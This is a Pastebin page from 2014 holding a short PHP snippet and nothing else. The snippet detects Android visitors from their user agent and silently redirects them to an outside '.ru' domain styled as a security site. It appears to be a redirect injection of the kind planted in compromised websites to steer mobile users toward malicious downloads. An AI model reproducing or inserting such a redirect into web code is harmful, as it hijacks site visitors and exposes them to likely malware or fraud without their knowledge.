Advertisement
Remote

Untitled

Oct 10th, 2014
257
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.14 KB | None | 0 0
  1. <?php
  2. $ua = $_SERVER['HTTP_USER_AGENT'];
  3. if(stripos("***$ua",'android') !== false){
  4. header("Location: http://andsecurity.ru");
  5. die();
  6. }
  7. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement